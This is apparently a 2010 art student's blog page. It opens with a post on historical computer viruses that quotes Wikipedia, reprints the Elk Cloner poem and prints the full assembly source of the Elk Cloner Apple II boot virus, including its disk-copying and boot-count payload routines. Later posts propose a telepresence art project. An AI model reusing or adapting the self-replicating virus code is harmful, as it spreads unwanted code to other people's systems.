On Viral Poetry

computer virus is a computer program that can copy itself and infect a computer.

From Wikipedia:

The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s.[4] Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1971.[5] Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, “I’m the creeper, catch me if you can!” was displayed. The Reaper program was created to delete Creeper.[6]

A program called “Rother J” was the first computer virus to appear “in the wild” — that is, outside the single computer or lab where it was created.[7] Written in 1981 by Richard Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk.[7][8] This virus, created as a practical joke when Skrenta was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning “Elk Cloner: The program with a personality.”

Elk Cloner (circa 1982)

     Elk Cloner:  The program with a personality

        It will get on all your disks
          It will infiltrate your chips
            Yes it's Cloner!

        It will stick to you like glue
          It will modify ram too
            Send in the Cloner!


and:

	ORG $9000
VERSN	DFB $02 
HIMEM	LDA #$FF
	STA $4C
	LDA #$8F
	STA $4D
DOPTCH	LDA #$20 
	STA $A180  
	LDA #$5B 
	STA $A181 
	LDA #$A7 
	STA $A182 
RUNPTCH	LDA #$AD
	STA $A4D1
	LDA #$B6
	STA $A4D2
	LDA #$AA
	STA $A4D3
LODPTCH	LDA #$4C
	STA $A413 
	LDA #>LOD
	STA $A414 
	LDA #<LOD
	STA $A415 
BLDPTCH	LDA #$4C
	STA $A35D
	LDA #>BLOD
	STA $A35E
	LDA #<BLOD
	STA $A35F
CATPTCH	LDA #$4C
	STA $A56E
	LDA #>CATALOG 
	STA $A56F
	LDA #<CATALOG
	STA $A570
USRPTCH	LDA #$4C
	STA $0A
	LDA #>USRCMD 
	STA $0B
	LDA #<USRCMD 
	STA $0C
BOOTUP	CLD
	JSR READ 
	LDX $B3BF
	INX
	STX $B3BF
	JSR WRITE 
	JSR DESTROY
	JMP $A180 
TESTON	LDA #$00
	STA FLAG1
	LDA $AA68
	STA $B7EA
	JSR READ
	LDA $B3C2 
	CMP VERSN 
	BEQ TESTON1 
	LDA #$01
	STA FLAG1
TESTON1	RTS
LOD	JSR TESTON
	LDA FLAG1
	CMP #$00
	BEQ LOD1
	JSR CLONE
LOD1	JSR $A316
	JMP $A416
BLOD	JSR TESTON
	LDA FLAG1
	CMP #$00
	BEQ BLOD1
	JSR CLONE
BLOD1	JSR $A2A8
	JMP $A360
CATALOG	JSR TESTON
	LDA #$06
	JSR $A2AA
	LDA $B5BF
	STA $AA66
	LDA FLAG1
	CMP #$00
	BEQ RETURN
	JSR CLONE
RETURN	LDA #$0
	STA $B3BE
	STA $B3BF
	STA $B3C0
	RTS
CLONE	CLC
	JSR READ 
	LDA IDENT
	STA $B3C0
	LDA VERSN 
	STA $B3C2 
	JSR WRITE 
	LDA $AA68
	STA $B7EA
	LDA #$02
	STA $B7F4
	STA $B7EC
	LDA #$08
	STA $B7ED
	LDA #$0
	STA $B7EB
	STA $B7F0
	LDA #$95
	STA $B7F1
CLONE1	LDA #$B7
	LDY #$E8
	JSR $B7B5
	CLD
	BCC CLONE2
	RTS 
CLONE2	DEC $B7ED
	DEC $B7F1
	LDA $B7F1
	CMP #$8F
	BNE CLONE1
	LDA #$02
	STA $B7F1
	LDA #$01
	STA $B7F4
	STA $B7EC
	LDA #$0 
	STA $B7ED
	LDA #$B7
	LDY #$E8
	JSR $B7B5
	CLD
	BCC CLONE3
	RTS 
CLONE3	LDA #$4C
	STA $280 
	LDA #$00
	STA $281 
	LDA #$9B
	STA $282 
	LDA #$02
	STA $B7F4
	LDA #$B7
	LDY #$E8
	JSR $B7B5
	CLD
	BCC CLONE4
	RTS 
CLONE4	LDA #$0
	STA $B7EC
	LDA #$A
	STA $B7ED
	LDA #$95
	STA $B7F1
	LDA #$B7
	LDY #$E8
	JSR $B7B5
	CLD 
	RTS
READ	LDA #$01
	STA $B7F4
	JMP VTOC
WRITE	LDA #$02
	STA $B7F4
VTOC	LDA #$11
	STA $B7EC
	LDA #$0
	STA $B7ED
	LDA #$BB 
	STA $B7F0
	LDA #$B3
	STA $B7F1
	LDA #$0
	STA $B7EB
	LDA #$B7
	LDY #$E8
	JSR $B7B5
	CLD 
	RTS
PRINT	STY $FC
	STA $FD
	LDY #$00
PRINT0	LDA ($FC),Y 
	CMP #$00
	BEQ PRINT1
	JSR $FDED
	INY  
	JMP PRINT0
PRINT1	RTS
PRTMSG	LDY #>MSG
	LDA #<MSG
	JSR PRINT
PRTNUM	LDA IDENT
	STA $44
	JSR $AE42
	LDA #$8D
	JSR $FDED
	RTS
MSG	ASC 'ELK CLONER V2.0 # '
	DFB $0
IDENT	DFB $1
FLAG1	DFB $00
RET	RTS
USRCMD	JSR $E6FB
	CPX #$0B 
	BNE CMD2
	JSR PRTMSG
	RTS
CMD2	CPX #$0C 
	BNE CMD3
	LDY #>REPORT
	LDA #<REPORT
	JSR PRINT
	JSR READ 
	LDA $B3BF
	STA $44
	JSR $AE42
	LDA #$8D
	JSR $FDED
	RTS
CMD3	CPX #$0D 
	BNE CMD4
	JSR CLONE
	RTS
CMD4	CPX #$0A
	BNE USRERR
	JSR PRPOEM
	RTS
USRERR	LDY #>UERR
	LDA #<UERR
	JSR PRINT
	JSR $FBDD
	JMP $9DBF
UERR	DFB $8D 
	ASC 'ILLEGAL QUANTITY ERROR'
	DFB $0
PRPOEM	JSR $FC58
	LDY #>POEM
	LDA #<POEM
	JSR PRINT
	RTS
REPORT	ASC 'BOOT COUNT: ' 
	DFB $0 
POEM	ASC 'ELK CLONER:'
	DFB $8D,$8D 
	ASC '   THE PROGRAM WITH A PERSONALITY'
	DFB $8D,$8D,$8D 
	ASC 'IT WILL GET ON ALL YOUR DISKS'
	DFB $8D
	ASC 'IT WILL INFILTRATE YOUR CHIPS'
	DFB $8D
	ASC 'YES IT'
	DFB $A7
	ASC 'S CLONER!'
	DFB $8D,$8D
	ASC 'IT WILL STICK TO YOU LIKE GLUE'
	DFB $8D
	ASC 'IT WILL MODIFY RAM TOO'
	DFB $8D
	ASC 'SEND IN THE CLONER!'
	DFB $8D,$8D,$8D,$8D,$0 
IOERR	LDY #>ERRMSG
	LDA #<ERRMSG
	JSR PRINT
	JSR $FBDD 
	JMP $9DBF 
ERRMSG	DFB $8D,$8D 
	ASC 'I/O ERROR'
	DFB $8D,$00 
DESTROY	LDA $B3BF
	CMP #10 
	BNE DEST1
	LDA #$69 
	STA $3F2
	LDA #$FF 
	STA $3F3
	JSR $FB6F
	RTS
DEST1	CMP #15 
	BNE DEST2
	LDA #$3F
	STA $32
	RTS
DEST2	CMP #20 
	BNE DEST3
	LDA $C030
	LDA $C030
	LDA $C030
	RTS
DEST3	CMP #25 
	BNE DEST4
	LDA #$7F
	STA $32
	RTS
DEST4	CMP #30 
	BNE DEST5
	LDA #'I'
	STA $B3A7
	LDA #'T'
	STA $B3A8
	LDA #'B'
	STA $B3A9
	LDA #'A'
	STA $B3AA 
	RTS
DEST5	CMP #35 
	BNE DEST6
	LDA #$85
	STA $AAB2
	RTS
DEST6	CMP #40 
	BNE DEST7
	LDA #$00
	STA $3F2
	LDA #$03
	STA $3F3
	JSR $FB6F
	LDA #$4C
	STA $300
	LDA #$00
	STA $301
	LDA #$03
	STA $302
	RTS
DEST7	CMP #45 
	BNE DEST8
	LDA #$80
	STA $D6
	RTS
DEST8	CMP #50 
	BNE DEST9
	LDA #>PRPOEM
	STA $3F2
	LDA #<PRPOEM
	STA $3F3
	JSR $FB6F
	RTS
DEST9	CMP #55 
	BNE DEST10
	LDA #$FF
	STA $BDD3
	RTS
DEST10	CMP #60 
	BNE DEST11
	LDA #$20
	STA $BDD3
	RTS
DEST11	CMP #65 
	BNE DEST12
	LDA #$4C
	STA $A180
	LDA #$69
	STA $A181
	LDA #$FF
	STA $A182
	RTS
DEST12	CMP #70 
	BNE DEST13
	LDA #$10
	STA $BDD3
	RTS
DEST13	CMP #75 
	BNE DEST14
	JMP $C600
DEST14	CMP #76 
	BNE DEST15 
	JMP $C600
DEST15	CMP #77 
	BNE DEST16
	JMP $C600
DEST16	CMP #78 
	BNE DEST17
	JMP $C600
DEST17	CMP #79 
	BNE DEST18
	JSR READ 
	LDA #$00
	STA $B3BF
	JSR WRITE 
	RTS
DEST18	RTS
LOADER	ORG $9500
	LDA #$02 
	STA $B7EC 
	LDA #$01 
	STA $B7F4 
	LDA #$03
	STA $B7ED
	LDA #$0
	STA $B7EB
	STA $B7F0
	LDA #$90
	STA $B7F1
LOAD1	LDA #$B7
	LDY #$E8
	JSR $B7B5
	INC $B7ED
	INC $B7F1
	LDA $B7F1
	CMP #$96
	BCC LOAD1
	JMP HIMEM
February 19, 2010 | Comments Off on On Viral Poetry  Tags: , ,

I’m jut a gigolo

http://www.yuditskaya.com/site/index.php?/dump/gigalo/

the site of the current project, replacing myself with a bot or three

February 17, 2010 | Comments Off on I’m jut a gigolo  Tags: , , , , , , ,

I ain’t got no body, calendar and mood boards

Schedule:

10 weeks (last two weeks of the semester are reserved for finishing, dealing with lose ends and unexpected problems, making the documentation website, and preparing the piece for the show)

week 1(by Feb 9) Have Reliable Xbee communication between website and “body” the last run failed after the first few commands were sent. Determine what kind of interaction design should occur between user and body

week 2(by Feb 16) Design and start amassing parts for “body”, should it be able to walk, should it be modular, a space, I don’t know

week 3(by Feb 23) Make trial run (maybe send it to canada and use it to play with sister, or give it to Ben)

week 4(by March 2)revisions/reiteration

week 5(by March 9) one more exchange/test

week 6(by March 16) time to order new/more parts if necessary, change control interface if necessary

week 7(by March 23)next test

week 8(by March 30)recap, re-assesment

week 9(by April 6)build up the project again

week 10(by April 13)document/source code

(my dates don’t seem to coincide with the academic calendar, I don’t care enough to fix them, earlier is better)

The three projects that I feel are successful that are related to mine are the first three slides.

The first slide is a scene from the movie “surrogates” which while being a product of the holywood machine, does have it’s successes. I particularly liked one part in the movie when the antagonist went clubbing in the body of a 20 year old british pop star looking body and met a woman, who was kindof a typical holywood blonde. They liberally flung themselves (or maybe just one of them did), off the side of a building to no harm. They turned into an alley way, and right before the fateful moment of coitus, they were murdered. The young man turned out to be a wheel chair bound decrepit, and the blonde was a clinically overweight man.

It was nice in that the characters were engaging each other as androids and also as the characters in human society that they were representing. Of course the scene was super successful because it was actually played by a sultry hollywood blonde and a young man that looks like a british pop star. Which is further amusing on account of all the recursion, us dealing with actors in the first place and so on.

The second slide is of Golan Levin’s Opto Isolator and Double Take. These robots are following an algorithm that dictates their actions, but they have incredible personality and character. Even of they were commandeered by any stranger they would still be very much driven by the nature of their bodies. And that is one of the aspects of this project that is driving me most, the desire to experience, no matter how remotely, existence in another body,

Next is Adrianne Wortzel’s Kiru from Camouflage Town. Her work centers around robotics and theater. This makes it particularly interesting in that she works on developing specific characters. People from the internet could control Kiru and engage with visitors in the museum, but only through his voice, and body.

The rest of the images are aesthetic inspiration, not conceptual. Although the lunahods and astronaughts whose bodies are monitored down to the heartbeat and sent out into space on behalf of humanity, are quite poignant. The ones on the bottom with men in bug like masks is also an art project, but I don’t remember it’s name, if you do, please write to yud dot sofy at gmail dot com.

I ain’t got no body, continued

I ain’t got no body, continued

How can this be done with love?

The body implemented would be specific in it’s composition, a character by virtue of it’s body, the way a cat is by default different from a snail. But the structure underneath it would be modular and multi purpose. Hopefully allowing me to continue on a path of development for a long run to come.

What: One or more “bodies” to jack into from the net, a net, etc. Possibly even, (and this has always been a fantasy of mine) a space. What does it mean about our experience of the world if our body is mapped to a space?

When: First Plateau: Develop protocol and plan for documentation etc.

Why: I always wondered what it would be like to be a carp, so flat and smooth, on the bottom of the sea floor. How do we map a carp’s body to that of a human?

Because I feel empty and I want to look at everything in such depth that maybe I will finally prove or disprove the reality of anything that I perceive. At least for the benefit of my own peace of mind, if nothing else.

To exacerbate the abyss of the other, push to the limit any indication that they really exist. Trying to mediate life with a mechanical process. Trying to mechanize deconstruct and decontextualize everything.

Who: Anyone with internet, should it be p2p? All access all the time, peep show 2.0 or something more specific you have to make an appointment for etc?

How: Serially enabled devices can be controlled from the internet, we will see which ones and how after some market research and analysis.

I am proposing to develop an open interface for telepresence, with some kind of modular infrastructure. Perhaps it will take the form of something like the chat roulette but with physically present “bodies”. Its related to teledildonics too, and all the beautiful notions of the passion where you give your body over to the process, except that process is embodied by other people, close ones, strangers.

I accept all assignments!

My own perceived strengths:

Some modicum of craftsmanship, some ability to make things work and bring them to a close if not a polish when push comes to shove, can organize workflow, know my limits

Weaknesses:

Poor language and communication abilities, laziness, don’t know my limits